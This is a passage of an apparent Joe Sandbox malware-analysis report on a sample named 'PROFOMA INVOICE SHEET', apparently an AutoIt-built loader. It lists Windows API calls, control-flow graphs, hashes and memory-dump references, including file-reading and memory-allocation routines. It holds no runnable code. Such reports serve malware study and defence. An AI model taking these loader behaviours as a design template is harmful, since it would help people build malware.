                                    • Instruction Fuzzy Hash: C111AF3120A2416BC717FF60E8B6ABF77A89B91740F44546EF1825A1E3CF219A498752
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: p#=
                                    • API String ID: 3964851224-1299286578
                                    • Opcode ID: a0382b131301f6ed51e6b08e6206eae89bfeb20170c336fb849e9212fc673d38
                                    • Instruction ID: 7b3e78d209a57b95f6eeeddfb51d1eb92b7b53aff06718ef2d9c1ac4049db8e2
                                    • Opcode Fuzzy Hash: a0382b131301f6ed51e6b08e6206eae89bfeb20170c336fb849e9212fc673d38
                                    • Instruction Fuzzy Hash: 1DA28B70619341CFC726CF18C490B6AB7E5BF89304F15996DE88A8B3A2D771EC45CB92
                                    APIs
                                    • GetInputState.USER32 ref: 0030D807
                                    • timeGetTime.WINMM ref: 0030DA07
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030DB28
                                    • TranslateMessage.USER32(?), ref: 0030DB7B
                                    • DispatchMessageW.USER32(?), ref: 0030DB89
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030DB9F
                                    • Sleep.KERNEL32(0000000A), ref: 0030DBB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                    • String ID:
                                    • API String ID: 2189390790-0
                                    • Opcode ID: 9ce13e4a3290e72b1c04349dc023e967e4af069bf34d29528d96f0969665803b
                                    • Instruction ID: 32b0e07155c847b09a072b0bfb97ab4d60ae4d73c7b9fe70f465922bcf47a354
                                    • Opcode Fuzzy Hash: 9ce13e4a3290e72b1c04349dc023e967e4af069bf34d29528d96f0969665803b
                                    • Instruction Fuzzy Hash: F242E230609341EFD72BCF64C864FAAB7E8BF46300F15851AE8558B2E1D771E848CB92

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00302D07
                                    • RegisterClassExW.USER32(00000030), ref: 00302D31
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00302D42
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00302D5F
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00302D6F
                                    • LoadIconW.USER32(000000A9), ref: 00302D85
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00302D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: cba9b11984740de75a69db612293044041ff85f5cbaf260370077a89eb1eeb31
                                    • Instruction ID: 9a620dbe737b9191a74d6c4ba6456c444b15f5f05ff327341e694a22f02fe356
                                    • Opcode Fuzzy Hash: cba9b11984740de75a69db612293044041ff85f5cbaf260370077a89eb1eeb31
                                    • Instruction Fuzzy Hash: 3021C3B5922218AFEB02DFA4EC59BDDBBB8FB08700F00511BF511A62A0D7B24544CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 302 34065b-34068b call 34042f 305 3406a6-3406b2 call 335221 302->305 306 34068d-340698 call 32f2c6 302->306 311 3406b4-3406c9 call 32f2c6 call 32f2d9 305->311 312 3406cb-340714 call 34039a 305->312 313 34069a-3406a1 call 32f2d9 306->313 311->313 321 340716-34071f 312->321 322 340781-34078a GetFileType 312->322 323 34097d-340983 313->323 327 340756-34077c GetLastError call 32f2a3 321->327 328 340721-340725 321->328 324 3407d3-3407d6 322->324 325 34078c-3407bd GetLastError call 32f2a3 CloseHandle 322->325 330 3407df-3407e5 324->330 331 3407d8-3407dd 324->331 325->313 339 3407c3-3407ce call 32f2d9 325->339 327->313 328->327 332 340727-340754 call 34039a 328->332 335 3407e9-340837 call 33516a 330->335 336 3407e7 330->336 331->335 332->322 332->327 345 340847-34086b call 34014d 335->345 346 340839-340845 call 3405ab 335->346 336->335 339->313 352 34086d 345->352 353 34087e-3408c1 345->353 346->345 351 34086f-340879 call 3386ae 346->351 351->323 352->351 355 3408e2-3408f0 353->355 356 3408c3-3408c7 353->356 359 3408f6-3408fa 355->359 360 34097b 355->360 356->355 358 3408c9-3408dd 356->358 358->355 359->360 361 3408fc-34092f CloseHandle call 34039a 359->361 360->323 364 340931-34095d GetLastError call 32f2a3 call 335333 361->364 365 340963-340977 361->365 364->365 365->360
                                    APIs
                                      • Part of subcall function 0034039A: CreateFileW.KERNELBASE(00000000,00000000,?,00340704,?,?,00000000,?,00340704,00000000,0000000C), ref: 003403B7
                                    • GetLastError.KERNEL32 ref: 0034076F
                                    • __dosmaperr.LIBCMT ref: 00340776
                                    • GetFileType.KERNELBASE(00000000), ref: 00340782
                                    • GetLastError.KERNEL32 ref: 0034078C
                                    • __dosmaperr.LIBCMT ref: 00340795
                                    • CloseHandle.KERNEL32(00000000), ref: 003407B5
                                    • CloseHandle.KERNEL32(?), ref: 003408FF
                                    • GetLastError.KERNEL32 ref: 00340931
                                    • __dosmaperr.LIBCMT ref: 00340938
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 49794579435ed7e79b91136c4f6844cbcd8567d678cce5b3ae3e899668fb7734
                                    • Instruction ID: 5c73986c389387c2d7e7752e2f441eada2ecf6ea87afcabd9fd2db7fb2b07517
                                    • Opcode Fuzzy Hash: 49794579435ed7e79b91136c4f6844cbcd8567d678cce5b3ae3e899668fb7734
                                    • Instruction Fuzzy Hash: 2EA13636A001148FDF1EAF68D891BAE7BF4EB06320F25015AF911AF291D735AC12CB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00303A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D1418,?,00302E7F,?,?,?,00000000), ref: 00303A78
                                      • Part of subcall function 00303357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00303379
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0030356A
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0034318D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003431CE
                                    • RegCloseKey.ADVAPI32(?), ref: 00343210
                                    • _wcslen.LIBCMT ref: 00343277
                                    • _wcslen.LIBCMT ref: 00343286
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 98802146-2727554177
                                    • Opcode ID: 35ebe9a080f21abacafb5633200ebf6b38990a2a4125e4a79658d43782127013
                                    • Instruction ID: d0df0728064028b63a85b68b57d28fe9f2a384ffbffd028bcbb3dc487e80f21b
                                    • Opcode Fuzzy Hash: 35ebe9a080f21abacafb5633200ebf6b38990a2a4125e4a79658d43782127013
                                    • Instruction Fuzzy Hash: 59719E755063019FC706EF65EC929ABBBECFFA5340F40092EF5458B2A1DB709A48CB61

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00302B8E
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00302B9D
                                    • LoadIconW.USER32(00000063), ref: 00302BB3
                                    • LoadIconW.USER32(000000A4), ref: 00302BC5
                                    • LoadIconW.USER32(000000A2), ref: 00302BD7
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00302BEF
                                    • RegisterClassExW.USER32(?), ref: 00302C40
                                      • Part of subcall function 00302CD4: GetSysColorBrush.USER32(0000000F), ref: 00302D07
                                      • Part of subcall function 00302CD4: RegisterClassExW.USER32(00000030), ref: 00302D31
                                      • Part of subcall function 00302CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00302D42
                                      • Part of subcall function 00302CD4: InitCommonControlsEx.COMCTL32(?), ref: 00302D5F
                                      • Part of subcall function 00302CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00302D6F
                                      • Part of subcall function 00302CD4: LoadIconW.USER32(000000A9), ref: 00302D85
                                      • Part of subcall function 00302CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00302D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: 1c4cebb51eafbf5d8171e6591eb9b023f6369b3497ebc79ba696f513e323f407
                                    • Instruction ID: 2b78cc67b0da61fdcd26854da251c318b96c98f542c8104e62e27d69c6b6bc57
                                    • Opcode Fuzzy Hash: 1c4cebb51eafbf5d8171e6591eb9b023f6369b3497ebc79ba696f513e323f407
                                    • Instruction Fuzzy Hash: A2211A78E12314BFDB129FE5FC55A997FB8FB48B50F40011BE504A66A0D7B10540CF90
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0030BB4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: p#=$p#=$p#=$p#=$p%=$p%=$x#=$x#=
                                    • API String ID: 1385522511-630006126
                                    • Opcode ID: 38f3aa248205e7ff19a3a7198036c2803906946896328174b9aba395ddd725a0
                                    • Instruction ID: 36df2c4c1d25874a69269ef8a52ca9452c2b1a1a99057ce79712d9796d944277
                                    • Opcode Fuzzy Hash: 38f3aa248205e7ff19a3a7198036c2803906946896328174b9aba395ddd725a0
                                    • Instruction Fuzzy Hash: A232E039A01209DFCB1ACF54C8A4EBEB7B9EF44300F168059ED15AB2A1C775ED45CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 650 303170-303185 651 3031e5-3031e7 650->651 652 303187-30318a 650->652 651->652 653 3031e9 651->653 654 3031eb 652->654 655 30318c-303193 652->655 658 3031d0-3031d8 DefWindowProcW 653->658 659 3031f1-3031f6 654->659 660 342dfb-342e23 call 3018e2 call 31e499 654->660 656 303265-30326d PostQuitMessage 655->656 657 303199-30319e 655->657 665 303219-30321b 656->665 662 3031a4-3031a8 657->662 663 342e7c-342e90 call 36bf30 657->663 664 3031de-3031e4 658->664 666 3031f8-3031fb 659->666 667 30321d-303244 SetTimer RegisterWindowMessageW 659->667 693 342e28-342e2f 660->693 669 342e68-342e77 call 36c161 662->669 670 3031ae-3031b3 662->670 663->665 687 342e96 663->687 665->664 673 303201-303214 KillTimer call 3030f2 call 303c50 666->673 674 342d9c-342d9f 666->674 667->665 671 303246-303251 CreatePopupMenu 667->671 669->665 677 342e4d-342e54 670->677 678 3031b9-3031be 670->678 671->665 673->665 680 342dd7-342df6 MoveWindow 674->680 681 342da1-342da5 674->681 677->658 690 342e5a-342e63 call 360ad7 677->690 685 303253-303263 call 30326f 678->685 686 3031c4-3031ca 678->686 680->665 688 342dc6-342dd2 SetFocus 681->688 689 342da7-342daa 681->689 685->665 686->658 686->693 687->658 688->665 689->686 694 342db0-342dc1 call 3018e2 689->694 690->658 693->658 698 342e35-342e48 call 3030f2 call 303837 693->698 694->665 698->658
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0030316A,?,?), ref: 003031D8
                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0030316A,?,?), ref: 00303204
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00303227
                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0030316A,?,?), ref: 00303232
                                    • CreatePopupMenu.USER32 ref: 00303246
                                    • PostQuitMessage.USER32(00000000), ref: 00303267
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303
                                    • Opcode ID: ce91705495734c3f28411c9afe42e68ae0f942b515ab74ab75c6f5593aa1ce3f
                                    • Instruction ID: 51198d54bafafe20587e4612478c01d5c8fccbee6ab5cc29a7ce3839cd081e85
                                    • Opcode Fuzzy Hash: ce91705495734c3f28411c9afe42e68ae0f942b515ab74ab75c6f5593aa1ce3f
                                    • Instruction Fuzzy Hash: A3413B39256200BBDB1B6BBCEC3DB7A375DEB0A340F041517F5129A6E1C771DA8097A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D%=$D%=$D%=$D%=$D%=D%=$Variable must be of type 'Object'.
                                    • API String ID: 0-966852419
                                    • Opcode ID: 25257e28e047729d9e82260612a34bb02370f3150c15c586a901682ca9d6b312
                                    • Instruction ID: ced09a07da9a341004fea09effa64c2dc981aec15591da3e8bf85c65b31dea6b
                                    • Opcode Fuzzy Hash: 25257e28e047729d9e82260612a34bb02370f3150c15c586a901682ca9d6b312
                                    • Instruction Fuzzy Hash: 96C2BE75B01214CFCB26CF58D8A0AADB7B5FF09300F258969E946AB3A1D375ED41CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1216 3dbba60-3dbbb0e call 3db9470 1219 3dbbb15-3dbbb3b call 3dbc970 CreateFileW 1216->1219 1222 3dbbb3d 1219->1222 1223 3dbbb42-3dbbb52 1219->1223 1224 3dbbc8d-3dbbc91 1222->1224 1231 3dbbb59-3dbbb73 VirtualAlloc 1223->1231 1232 3dbbb54 1223->1232 1225 3dbbcd3-3dbbcd6 1224->1225 1226 3dbbc93-3dbbc97 1224->1226 1228 3dbbcd9-3dbbce0 1225->1228 1229 3dbbc99-3dbbc9c 1226->1229 1230 3dbbca3-3dbbca7 1226->1230 1233 3dbbce2-3dbbced 1228->1233 1234 3dbbd35-3dbbd4a 1228->1234 1229->1230 1235 3dbbca9-3dbbcb3 1230->1235 1236 3dbbcb7-3dbbcbb 1230->1236 1237 3dbbb7a-3dbbb91 ReadFile 1231->1237 1238 3dbbb75 1231->1238 1232->1224 1241 3dbbcef 1233->1241 1242 3dbbcf1-3dbbcfd 1233->1242 1243 3dbbd5a-3dbbd62 1234->1243 1244 3dbbd4c-3dbbd57 VirtualFree 1234->1244 1235->1236 1245 3dbbccb 1236->1245 1246 3dbbcbd-3dbbcc7 1236->1246 1239 3dbbb98-3dbbbd8 VirtualAlloc 1237->1239 1240 3dbbb93 1237->1240 1238->1224 1247 3dbbbda 1239->1247 1248 3dbbbdf-3dbbbfa call 3dbcbc0 1239->1248 1240->1224 1241->1234 1249 3dbbcff-3dbbd0f 1242->1249 1250 3dbbd11-3dbbd1d 1242->1250 1244->1243 1245->1225 1246->1245 1247->1224 1256 3dbbc05-3dbbc0f 1248->1256 1252 3dbbd33 1249->1252 1253 3dbbd2a-3dbbd30 1250->1253 1254 3dbbd1f-3dbbd28 1250->1254 1252->1228 1253->1252 1254->1252 1257 3dbbc42-3dbbc56 call 3dbc9d0 1256->1257 1258 3dbbc11-3dbbc40 call 3dbcbc0 1256->1258 1264 3dbbc5a-3dbbc5e 1257->1264 1265 3dbbc58 1257->1265 1258->1256 1266 3dbbc6a-3dbbc6e 1264->1266 1267 3dbbc60-3dbbc64 CloseHandle 1264->1267 1265->1224 1268 3dbbc7e-3dbbc87 1266->1268 1269 3dbbc70-3dbbc7b VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03DBBB31
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03DBBD57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                    • Instruction ID: 94f5f89eae2661a5111bc44c4b31047189a440bd67c37d61565bb84d1f94d6bd
                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                    • Instruction Fuzzy Hash: A8A1FA74E00209EBDB14CFA4C994BEEB7B5FF48704F24859AE506BB280DB759A41CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1280 302c63-302cd3 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00302C91
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00302CB2
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00301CAD,?), ref: 00302CC6
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00301CAD,?), ref: 00302CCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: a7120b1572f6be29b0da48ed5530d180ba215369d55ed335f7c408c5e6950f67
                                    • Instruction ID: 225f7c9633c2023b1225fe9ba97df71f327b23012d3aa8662c113030c0bf98c9
                                    • Opcode Fuzzy Hash: a7120b1572f6be29b0da48ed5530d180ba215369d55ed335f7c408c5e6950f67
                                    • Instruction Fuzzy Hash: B8F0D4796512907BEB331B27BC08EB72FBDD7CAF60F00105BF904A25A0C6B21850DAB0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1395 3dbb820-3dbb957 call 3db9470 call 3dbb710 CreateFileW 1402 3dbb959 1395->1402 1403 3dbb95e-3dbb96e 1395->1403 1404 3dbba0e-3dbba13 1402->1404 1406 3dbb970 1403->1406 1407 3dbb975-3dbb98f VirtualAlloc 1403->1407 1406->1404 1408 3dbb993-3dbb9aa ReadFile 1407->1408 1409 3dbb991 1407->1409 1410 3dbb9ae-3dbb9e8 call 3dbb750 call 3dba710 1408->1410 1411 3dbb9ac 1408->1411 1409->1404 1416 3dbb9ea-3dbb9ff call 3dbb7a0 1410->1416 1417 3dbba04-3dbba0c ExitProcess 1410->1417 1411->1404 1416->1417 1417->1404
                                    APIs
                                      • Part of subcall function 03DBB710: Sleep.KERNELBASE(000001F4), ref: 03DBB721
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DBB94D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: Q596P8EHVI
                                    • API String ID: 2694422964-750146690
                                    • Opcode ID: 8d764905f31dc5872677139215ccf54ee001ce812867f351bd1f135e84fb7f60
                                    • Instruction ID: 7acb14484e9e7f2b17adeafb40312ee66af9c7393170f65d39756e436d68f740
                                    • Opcode Fuzzy Hash: 8d764905f31dc5872677139215ccf54ee001ce812867f351bd1f135e84fb7f60
                                    • Instruction Fuzzy Hash: 8B518D74D04248EBEF10DBA4C855BEEBB79EF48700F00459AE609BB2C0D6B95B45CBA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1729 303b1c-303b27 1730 303b99-303b9b 1729->1730 1731 303b29-303b2e 1729->1731 1732 303b8c-303b8f 1730->1732 1731->1730 1733 303b30-303b48 RegOpenKeyExW 1731->1733 1733->1730 1734 303b4a-303b69 RegQueryValueExW 1733->1734 1735 303b80-303b8b RegCloseKey 1734->1735 1736 303b6b-303b76 1734->1736 1735->1732 1737 303b90-303b97 1736->1737 1738 303b78-303b7a 1736->1738 1739 303b7e 1737->1739 1738->1739 1739->1735
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B40
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B61
                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
